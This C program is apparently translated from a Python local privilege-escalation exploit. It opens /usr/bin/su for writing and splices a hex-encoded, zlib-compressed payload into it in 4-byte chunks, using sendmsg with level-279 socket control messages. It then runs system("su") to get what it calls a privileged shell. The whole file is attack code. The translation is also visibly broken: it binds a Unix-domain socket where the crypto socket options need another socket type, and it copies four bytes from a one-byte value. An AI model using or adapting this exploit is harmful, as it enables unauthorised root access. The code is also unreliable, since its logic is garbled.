/*-------------------------------------------------------------- Translated from the original Python source. The code tries to mimic the original logic using POSIX sockets, pipes, splice, zlib decompression and finally executes "su". --------------------------------------------------------------*/ #define _GNU_SOURCE /* for splice() */ #include #include #include #include #include #include #include #include #include #include #include #include #include /* ------------------------------------------------------------ Helper: convert a hex string to a binary buffer. The returned buffer must be freed by the caller. ------------------------------------------------------------ */ static unsigned char *hex_to_bytes(const char *hex, size_t *out_len) { size_t len = strlen(hex); *out_len = len / 2; unsigned char *buf = malloc(*out_len); if (!buf) { perror("malloc"); exit(EXIT_FAILURE); } for (size_t i = 0; i < *out_len; ++i) { unsigned int byte; if (sscanf(hex + 2 * i, "%2x", &byte) != 1) { fprintf(stderr, "Invalid hex character at position %zu\n", i); free(buf); exit(EXIT_FAILURE); } buf[i] = (unsigned char)byte; } return buf; } /* ------------------------------------------------------------ Helper: decompress a zlib‑compressed buffer. The caller must free the returned buffer. ------------------------------------------------------------ */ static unsigned char *zlib_decompress(const unsigned char *in, size_t in_len, size_t *out_len) { /* Start with a reasonable buffer and grow if needed */ size_t buf_sz = in_len * 4; unsigned char *out = malloc(buf_sz); if (!out) { perror("malloc"); exit(EXIT_FAILURE); } z_stream strm = {0}; strm.next_in = (Bytef *)in; strm.avail_in = (uInt)in_len; if (inflateInit(&strm) != Z_OK) { fprintf(stderr, "inflateInit failed\n"); free(out); exit(EXIT_FAILURE); } int ret; do { if (strm.total_out >= buf_sz) { buf_sz *= 2; out = realloc(out, buf_sz); if (!out) { perror("realloc"); inflateEnd(&strm); exit(EXIT_FAILURE); } } strm.next_out = out + strm.total_out; strm.avail_out = (uInt)(buf_sz - strm.total_out); ret = inflate(&strm, Z_NO_FLUSH); } while (ret == Z_OK); if (ret != Z_STREAM_END) { fprintf(stderr, "inflate error: %d\n", ret); inflateEnd(&strm); free(out); exit(EXIT_FAILURE); } *out_len = strm.total_out; inflateEnd(&strm); return out; } /* ------------------------------------------------------------ Function that mirrors the original Python `c(f, t, cbuf)` logic. It creates a temporary UNIX socket, configures a few socket options, sends a crafted message, then splices data from the file descriptor `src_fd` to the socket. ------------------------------------------------------------ */ static void send_chunk(int src_fd, uint32_t offset, const unsigned char *chunk) { int sock_fd = -1, client_fd = -1; struct sockaddr_un addr; int opt_val; struct msghdr msg = {0}; struct iovec iov; unsigned char ctrl_buf[256]; struct cmsghdr *cmsg; /* -------------------------------------------------------- 1. Create a Unix domain socket (AF_UNIX, SOCK_STREAM) -------------------------------------------------------- */ sock_fd = socket(AF_UNIX, SOCK_STREAM, 0); if (sock_fd < 0) { perror("socket"); goto cleanup; } memset(&addr, 0, sizeof(addr)); addr.sun_family = AF_UNIX; /* The original Python code bound to a bizarre tuple; we bind to an abstract socket name to avoid filesystem side‑effects. */ strncpy(addr.sun_path + 1, "aead_auth", sizeof(addr.sun_path) - 2); if (bind(sock_fd, (struct sockaddr *)&addr, offsetof(struct sockaddr_un, sun_path) + 1 + strlen("aead_auth")) < 0) { perror("bind"); goto cleanup; } /* -------------------------------------------------------- 2. Set socket options (the numbers are kept from the Python script but their meaning is undefined – we pass the raw bytes directly). -------------------------------------------------------- */ { const char *opt_hex = "0800010000000010" /* + 64 zeroes */; size_t opt_len; unsigned char *opt_data = hex_to_bytes(opt_hex, &opt_len); /* option level 279, option name 1 */ setsockopt(sock_fd, 279, 1, opt_data, (socklen_t)opt_len); free(opt_data); } /* second option: level 279, name 5, NULL buffer of length 4 */ opt_val = 0; setsockopt(sock_fd, 279, 5, &opt_val, 4); /* -------------------------------------------------------- 3. Accept a (non‑existent) connection – we simulate this by calling listen() and connect() on a second socket. -------------------------------------------------------- */ if (listen(sock_fd, 1) < 0) { perror("listen"); goto cleanup; } { int connector = socket(AF_UNIX, SOCK_STREAM, 0); if (connector < 0) { perror("socket (connector)"); goto cleanup; } if (connect(connector, (struct sockaddr *)&addr, offsetof(struct sockaddr_un, sun_path) + 1 + strlen("aead_auth")) < 0) { perror("connect"); close(connector); goto cleanup; } client_fd = accept(sock_fd, NULL, NULL); if (client_fd < 0) { perror("accept"); close(connector); goto cleanup; } close(connector); } /* -------------------------------------------------------- 4. Build the message with ancillary data. -------------------------------------------------------- */ unsigned char zero = 0x00; unsigned char i4[4] = {0, 0, 0, 0}; /* Payload: "A"*4 + chunk */ unsigned char *payload = malloc(4 + 4); memset(payload, 'A', 4); memcpy(payload + 4, chunk, 4); iov.iov_base = payload; iov.iov_len = 8; /* 4 A's + 4‑byte chunk */ msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = ctrl_buf; msg.msg_controllen = sizeof(ctrl_buf); cmsg = CMSG_FIRSTHDR(&msg); cmsg->cmsg_level = 279; cmsg->cmsg_type = 3; cmsg->cmsg_len = CMSG_LEN(4); memcpy(CMSG_DATA(cmsg), &zero, 4); /* i*4 (zeroes) */ cmsg = CMSG_NXTHDR(&msg, cmsg); cmsg->cmsg_level = 279; cmsg->cmsg_type = 2; { unsigned char data[1 + 19] = {0x10}; memset(data + 1, zero, 19); cmsg->cmsg_len = CMSG_LEN(sizeof(data)); memcpy(CMSG_DATA(cmsg), data, sizeof(data)); } cmsg = CMSG_NXTHDR(&msg, cmsg); cmsg->cmsg_level = 279; cmsg->cmsg_type = 4; { unsigned char data[1 + 3] = {0x08}; memset(data + 1, zero, 3); cmsg->cmsg_len = CMSG_LEN(sizeof(data)); memcpy(CMSG_DATA(cmsg), data, sizeof(data)); } msg.msg_controllen = (unsigned char *)CMSG_NXTHDR(&msg, cmsg) - ctrl_buf; if (sendmsg(client_fd, &msg, 32768) < 0) { perror("sendmsg"); free(payload); goto cleanup; } free(payload); /* -------------------------------------------------------- 5. Pipe + splice: move data from src_fd (the opened file) to the socket. -------------------------------------------------------- */ { int pipefd[2]; if (pipe(pipefd) < 0) { perror("pipe"); goto cleanup; } /* splice src_fd -> pipe write end */ if (splice(src_fd, (off_t)(offset), pipefd[1], NULL, 4, SPLICE_F_MORE | SPLICE_F_MOVE) < 0) { perror("splice src->pipe"); close(pipefd[0]); close(pipefd[1]); goto cleanup; } /* splice pipe read end -> socket */ if (splice(pipefd[0], NULL, client_fd, NULL, 4, SPLICE_F_MORE | SPLICE_F_MOVE) < 0) { perror("splice pipe->socket"); } close(pipefd[0]); close(pipefd[1]); } /* -------------------------------------------------------- 6. Attempt to receive a response (ignore any error). -------------------------------------------------------- */ { unsigned char recv_buf[4096]; (void)recv(client_fd, recv_buf, 8 + offset, 0); } cleanup: if (client_fd >= 0) close(client_fd); if (sock_fd >= 0) close(sock_fd); } /* ------------------------------------------------------------ Main entry point – reproduces the high‑level flow of the Python script. ------------------------------------------------------------ */ int main(void) { /* 1. Open /usr/bin/su (read/write) */ int su_fd = open("/usr/bin/su", O_RDWR); if (su_fd < 0) { perror("open /usr/bin/su"); return EXIT_FAILURE; } /* 2. Decompress the embedded payload */ const char *payload_hex = "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"; size_t payload_bin_len; unsigned char *payload_bin = hex_to_bytes(payload_hex, &payload_bin_len); size_t decompressed_len; unsigned char *decompressed = zlib_decompress(payload_bin, payload_bin_len, &decompressed_len); free(payload_bin); /* 3. Iterate over the decompressed data 4 bytes at a time */ for (size_t offset = 0; offset + 4 <= decompressed_len; offset += 4) { send_chunk(su_fd, (uint32_t)offset, decompressed + offset); } free(decompressed); close(su_fd); /* 4. Finally, launch the privileged shell */ if (system("su") != 0) { fprintf(stderr, "system(\"su\") failed\n"); } return EXIT_SUCCESS; }